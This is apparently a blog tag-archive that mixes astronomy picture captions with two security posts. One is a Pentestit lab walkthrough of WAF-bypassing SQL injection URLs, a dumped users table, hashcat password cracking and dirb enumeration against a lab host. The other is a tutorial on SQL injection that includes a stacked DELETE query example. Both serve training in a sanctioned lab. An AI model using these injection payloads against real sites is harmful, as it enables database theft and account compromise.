Tag Archives: astronomy

Astronomy Picture of the Day – Dark Molecular Cloud Barnard 68

See Explanation.  Clicking on the picture will download
 the highest resolution version available.Dark Molecular Cloud Barnard 68 
Image Credit: FORS Team8.2-meter VLT AntuESOExplanation: Where did all the stars go? What used to be considered a hole in the sky is now known to astronomers as a dark molecular cloud. Here, a high concentration of dust and molecular gas absorb practically all the visible light emitted from background stars. The eerily dark surroundings help make the interiors of molecular clouds some of the coldest and most isolated places in the universe. One of the most notable of these dark absorption nebulae is a cloud toward the constellation Ophiuchus known as Barnard 68pictured here. That no stars are visible in the center indicates that Barnard 68 is relatively nearby, with measurements placing it about 500 light-years away and half a light-year across. It is not known exactly how molecular clouds like Barnard 68 form, but it is known that these clouds are themselves likely places for new stars to form. In fact, Barnard 68 itself has been found likely to collapse and form a new star system. It is possible to look right through the cloud in infrared light.

 

From: https://apod.nasa.gov/apod/ap171008.html

Advertisements

Astronomy Picture of the Day – Eclipsosaurus Rex

See Explanation.  Clicking on the picture will download
 the highest resolution version available.

Eclipsosaurus Rex 
Image Credit & CopyrightFred Espenak (MrEclipse.com)Explanation: We live in an era where total solar eclipses are possible because at times the apparent size of the Moon can just cover the disk of the Sun. But the Moon is slowly moving away from planet Earth. Its distance is measured to increase about 1.5 inches (3.8 centimeters) per year due to tidal friction. So there will come a time, about 600 million years from now, when the Moon is far enough away that the lunar disk will be too small to ever completely cover the Sun. Then, at best only annular eclipses, a ring of fire surrounding the silhouetted disk of the too small Moon, will be seen from the surface of our fair planet. Of course the Moon was slightly closer and loomed a little larger 100 million years ago. So during the age of the dinosaurs there were more frequent total eclipses of the Sun. In front of the Tate Geological Museum at Casper College in Wyoming, this dinosaur statue posed with a modern total eclipse, though. An automated camera was placed under him to shoot his portrait during the Great American Eclipse of August 21.

 

From: https://apod.nasa.gov/apod/ap171007.html

Astronomy Picture of the Day – Global Aurora at Mars

See Explanation.  Clicking on the picture will download
 the highest resolution version available.Global Aurora at Mars 
Image Credit: MAVENLASP, University of ColoradoNASAExplanation: A strong solar event last month triggered intense global aurora at Mars. Before (left) and during (right) the solar storm, these projections show the sudden increase in ultraviolet emission from martian aurora, more than 25 times brighter than auroral emission previously detected by the orbiting MAVEN spacecraft. With a sunlit crescent toward the right, data from MAVEN’s ultraviolet imaging spectrograph is projected in purple hues on the right side of Mars globes simulated to match the observation dates and times. On Mars, solar storms can result in planet-wide aurora because, unlike Earth, the Red Planet isn’t protected by a strong global magnetic field that can funnel energetic charged particles toward the poles. For all those on the planet’s surface during the solar storm, dangerous radiation levels were double any previously measured by the Curiosity rover. MAVEN is studying whether Mars lost its atmosphere due to its lack of a global magnetic field.

 

Source: https://apod.nasa.gov/apod/ap171006.html

Pentestit Lab v10 – The Site Token

In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website – which will include the following:

  • Mapping the Attack Surface & Defenses
  • Exploiting SQL Injection w/ WAF Bypass
  • Cracking SQL Hashes
  • Finding the Site Token

If you are reading this post for the first time, and have no clue on what’s going on – then I suggest you start from the beginning and read “Pentestit Lab v10 – Introduction & Setup”.

I also included a ton of resources in my second post that I linked above – you should seriously check that out if you already haven’t!

Mapping the Attack Surface & Defenses:

Whenever we attempt to attack a web application, we have to start by mapping out the web app and its associated structure. That means finding directories, hidden links, files, URL Query’s, etc.

Once we mapped our application – we can start by looking for vulnerabilities such as SQL Injection, XSS, Path Traversal, etc.

For the Global Data Security website (which I will call GDS from now on), I considered the Security Blog a good starting point.

192.168.101.9 443 - Security Blog
192.168.101.9 443 – Security Blog

After going through all the links on the website, I noticed a particular URL parameter in the blog posts that caught my eye.

192.168.101.9 mobile hack test page

Notice the id parameter being passed into the URL after post.php? We can actually test this parameter for SQL Injection!

Exploiting SQL Injection w/ WAF Bypass:

I began trying to exploit the id parameter, but for some reason every time I injected some SQL code, I was taken back to the home page.

This made me consider that there might be a WAF or Web Application Firewall in place, preventing me from exploiting this SQL Injection.

I decided to attempt a Case Change Bypass to see if I can somehow bypass the filter. This is due to the fact that some WAF’s only filter lowercase SQL keywords.

I began by injecting the following into the URL:

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,2%23

After submitting the query – you can see that the SQL Injection is in fact there, and that the Case Change allowed me to bypass the WAF filter.

192.168.101.9 sql inject testing 1-2

Now that we got the SQL Injection to work – let’s start by pulling all the tables in the database with the following:

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28taBlE_SCheMa,0x20a,TAblE_NaME%29+FrOm+iNfOrmaTioN_scHeMa.TabLeS+WHerE+tAblE_SchEma=DaTabAsE%28%29%23

192.168.101.9 sql inject test page

Nice! Now that we got our table names, let’s pull all the columns from the “site” table.

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28TAblE_NaME,0x20,CoLumN_NaME%29+FrOm+iNfOrmaTioN_scHeMa.ColUmNs+WHerE+tAblE_SchEma=%27site%27%23

 

192.168.101.9 sql inject testing tables

We see that the users table has a username and password column, so let’s go ahead and dump any data in those columns.

http://192.168.101.9:443/post.php?id=%27%29+UniOn+SeLecT+1,GroUp_ConCaT%28useRnAMe,0x20,paSswOrD%29+FrOm+site.users%23

 

192.168.101.9 sql inject lindsey

Cracking MySQL Hashes:

Awesome, we got another username, and a SQL Hash of the associated user’s password. Let’s first start by saving the username for future reference, along with the other usernames we have.

root@kali:~/gds# nano names
root@kali:~/gds# cat names 
a.modlin@gds.lab
s.locklear@gds.lab
j.wise@gds.lab
e.lindsey@gds.lab

Since we got a SQL Hash, let’s use hash-identifier to see what type of hash it is. Then, we can use HashCat to try and crack it!

root@kali:~/gds# nano lindsey_hash
root@kali:~/gds# cat lindsey_hash 
$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.


root@kali:~/gds# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Possible Hashs:
[+]  MD5(Unix)

   -------------------------------------------------------------------------

root@pentestit:~# hashcat -m 500 -a o lindsey_hash /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Skipping line: cat lindsey_hash (signature unmatched)
Added hashes from file lindsey_hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => r
$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.:lindsey123
                                            
All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 20.45k words
Progress..: 166528/3605274 (4.62%)
Running...: 00:00:00:09
Estimated.: 00:00:02:48


Started: Mon Mar 20 07:46:37 2017
Stopped: Mon Mar 20 07:46:46 2017

After some time we see that the MD5 Hash is that of the password lindsey123.

Finding the Site Token:

Since we were able to compromise a username and password, we need to find a place where we can leverage these credentials.

At this point, I decide to run dirb to try and enumerate any interesting directories that I might have missed.

root@pentestit:~# dirb http://192.168.101.9:443

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 07:50:58 2017
URL_BASE: http://192.168.101.9:443/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612 

---- Scanning URL: http://192.168.101.9:443/ ----
==> DIRECTORY: http://192.168.101.9:443/admin/ 
==> DIRECTORY: http://192.168.101.9:443/css/ 
==> DIRECTORY: http://192.168.101.9:443/img/ 
+ http://192.168.101.9:443/index.php (CODE:200|SIZE:7343) 
==> DIRECTORY: http://192.168.101.9:443/js/ 
==> DIRECTORY: http://192.168.101.9:443/mail/ 
==> DIRECTORY: http://192.168.101.9:443/vendor/ 
 
---- Entering directory: http://192.168.101.9:443/admin/ ----
+ http://192.168.101.9:443/admin/index.php (CODE:302|SIZE:0) 
 
---- Entering directory: http://192.168.101.9:443/css/ ----
 
---- Entering directory: http://192.168.101.9:443/img/ ----
 
---- Entering directory: http://192.168.101.9:443/js/ ----

---- Entering directory: http://192.168.101.9:443/mail/ ----

---- Entering directory: http://192.168.101.9:443/vendor/ ----
==> DIRECTORY: http://192.168.101.9:443/vendor/jquery/ 
 
---- Entering directory: http://192.168.101.9:443/vendor/jquery/ ----
 
-----------------
END_TIME: Mon Mar 20 08:00:01 2017
DOWNLOADED: 36896 - FOUND: 2

The admin console looks promising! So let’s go ahead and log in there!

192.168.101.9 site login and token

 

Once logged in, you should automatically see the Site Token on the main page.

Token (2/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the Blog to get the token!

Site  Token complete.PNG

You learn by practical work, so go through this walkthrough, and the lab – and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (3/13) – The SSH Token!

The Anatomy of a Web Application – SQL Injection

A web application is the target of a SQL injection attack, so you must understand how these apps work. A web app can be described simply as an application that is accessed through a web browser or application (such as the apps on a smartphone). However, we need to be a little more detailed with our description in order to better understand SQL injection. In essence, a web application works by performing these steps:

  1. The user makes a request through the web browser from the Internet to the web server.
  2. The web server accepts the request and forwards it to the applicable web application server.
  3. The web application server performs the requested task.
  4. The web application accesses the entire database available and responds to the web server.
  5. The web server responds back to the user once the transaction is complete.
  6. The requested information appears on the user’s monitor. The details involved in these steps can change depending on the application involved.

webapplicationfirewall

Server-side vs. Client-side

First let’s look at the type of technologies involved in browsing and working with the Web. They mainly fall into two areas: client-side and server-side. Server-side technologies are those that run and are executed on the server itself before delivering information to the requester. Client-side technologies are those that run within the browser or somewhere on the client side. For the purposes of our discussion, we will not be covering client-side here.

Server-side technologies come in many varieties and types, each of which offers something specific to the user. Generally, each of the technologies allows for the creation of dynamic and data-driven web applications. There are a wide range of server-side technologies that you can use to create these types of web applications, among them:

  • ASP
  • ASP.NET
  • Oracle
  • PHP
  • JSP
  • SQL Server
  • IBM DB2
  • MySQL
  • RubyOnRails

All of these technologies are powerful and offer the ability to generate web applications that are extremely versatile. Each also has vulnerabilities that can lead to them being compromised, but this chapter is not about those. This chapter, like SQL injection, is designed to target the code that is used to make the technologies access a database as part of its functioning. This code, when incorrectly crafted, can be scrutinized and result in vulnerabilities uncovered and exploited.

All that is SQL Injection

Introducing SQL Injection

SQL injection has been around for at least 20 years, but it is no less powerful or dangerous than any other attack we have covered so far. It is designed to exploit flaws in a website or web application. The attack works by inserting code into an existing line of code prior to its being executed by a database. If SQL injection is successful, attackers can cause their own code to run. In the real world this attack has proven dangerous because many developers are either not aware of the threat or don’t understand its seriousness. Developers should be aware that:

  • SQL injection is typically a result of flaws in the web application or website and is not an issue with the database.
  • SQL injection is at the source of many of the high-level or well-known attacks on the Internet.
  • The goal of attacks of this type is to submit commands through a web application to a database in order to retrieve or manipulate data. • The usual cause of this type of flaw is improper or absent input validation, thus allowing code to pass unimpeded to the database without being verified.

sql-injection

SQL Attacks in Action

In 2011, Sony Corporation was the victim of a SQL injection that compromised a multitude of accounts (estimated to be over one million e-mails, usernames, and passwords). The FBI revealed that a minimum of 100,000 records, including Social Security numbers of current and former federal employees, were compromised. Additionally, 2,800 of the records obtained included bank account numbers. When investigating this attack, the FBI revealed that not only the DoE and the Army were impacted; NASA, the U.S. Missile Defense Agency, and the Environmental Protection Agency were also affected. Details of these attacks have not been fully released as of this writing. SQL injection is achieved through the insertion of characters into existing SQL commands with the intention of altering the intended behavior. The following example illustrates SQL injection in action and how it is carried out. The example also reveals the impact of altering the existing values and structure of a SQL query.

In the following example, an attacker with the username link inputs for the original code after the = sign in WHERE owner which used to include the string ‘name’; DELETE FROM items; — for itemName into an existing SQL command, and the query becomes the following two queries:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items;--

Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.

If an attacker enters the string ‘name’; DELETE FROM items; SELECT * FROM items WHERE ‘a’ = ‘a’, the following three valid statements will be created:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items; 
SELECT * FROM items WHERE 'a' = 'a';

A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.

Results of SQL Injection

What can be accomplished as a result of a SQL injection attack? Well, there are a huge number of possibilities, which are limited only by the configuration of the system and the skill of the attacker.

If an attack is successful, a host of problems could result. Consider the following a sample of the potential outcomes:

  • Identity spoofing through manipulating databases to insert bogus or misleading information such as e-mails and contact information.
  • Alteration of prices in e-commerce applications. In this attack, the intruder once again alters data, but does so with the intention of changing price information in order to purchase products or services at a reduced rate.
  • Alteration of data or outright replacement of data in existing databases with information created by the attacker.
  • Escalation of privileges to increase the level of access an attacker has to the system, up to and including full administrative access to the operating system.
  • Denial of service, performed by flooding the server with requests designed to overwhelm the system.
  • Data extraction and disclosure of all data on the system through the manipulation of the database.
  • Destruction or corruption of data through rewriting, altering, or other means.
  • Eliminating or altering transactions that have been or will be committed

 

Next up will be all about the anatomy of a SQL Injection and Database vulnerabilities.

Seeing things sideways

This image from Hubble’s Wide Field Camera 3 (WFC3) shows NGC 1448, a spiral galaxy located about 50 million light-years from Earth in the little-known constellation of Horologium (The Pendulum Clock). We tend to think of spiral galaxies as massive and roughly circular celestial bodies, so this glittering oval does not immediately appear to fit the visual bill. What’s going on?

Imagine a spiral galaxy as a circular frisbee spinning gently in space. When we see it face on, our observations reveal a spectacular amount of detail and structure — a great example from Hubble is the telescope’s view of Messier 51, otherwise known as the Whirlpool Galaxy. However, the NGC 1448 frisbee is very nearly edge-on with respect to Earth, giving it an appearance that is more oval than circular. The spiral arms, which curve out from NGC 1448’s dense core, can just about be seen.

Although spiral galaxies might appear static with their picturesque shapes frozen in space, this is very far from the truth. The stars in these dramatic spiral configurations are constantly moving and spinning around the galaxy’s core, with those on the inside whirling around faster than those sitting further out. This makes the formation and continued existence of a spiral galaxy’s arms something of a cosmic puzzle, because the arms wrapped around the spinning core should become wound tighter and tighter as time goes on — but this is not what we see. This is known as the winding problem.Credit:

ESA/Hubble & NASA

Quasar’s light yields clues to outflow

This artist’s impression shows the light of several distant quasars piercing the northern half of the Fermi Bubbles, an outflow of gas expelled by the supermassive black hole in the centre of the Milky Way. The NASA/ESA Hubble Space Telescope probed the quasars’ light for information on the speed of the gas and whether the gas is moving toward or away from Earth. Based on the material’s speed, the research team estimated that the bubbles formed from an energetic event between 6 million and 9 million years ago.

The inset diagram at bottom left shows the measurement of gas moving toward and away from Earth, indicating the material is traveling at a high velocity.

Hubble also observed light from quasars that passed outside the northern bubble. The box at upper right reveals that the gas in one such quasar’s light path is not moving toward or away from Earth. This gas is in the disc of the Milky Way and does not share the same characteristics as the material probed inside the bubble.

Link:

Credit:

NASA, ESA, and Z. Levy (STScI)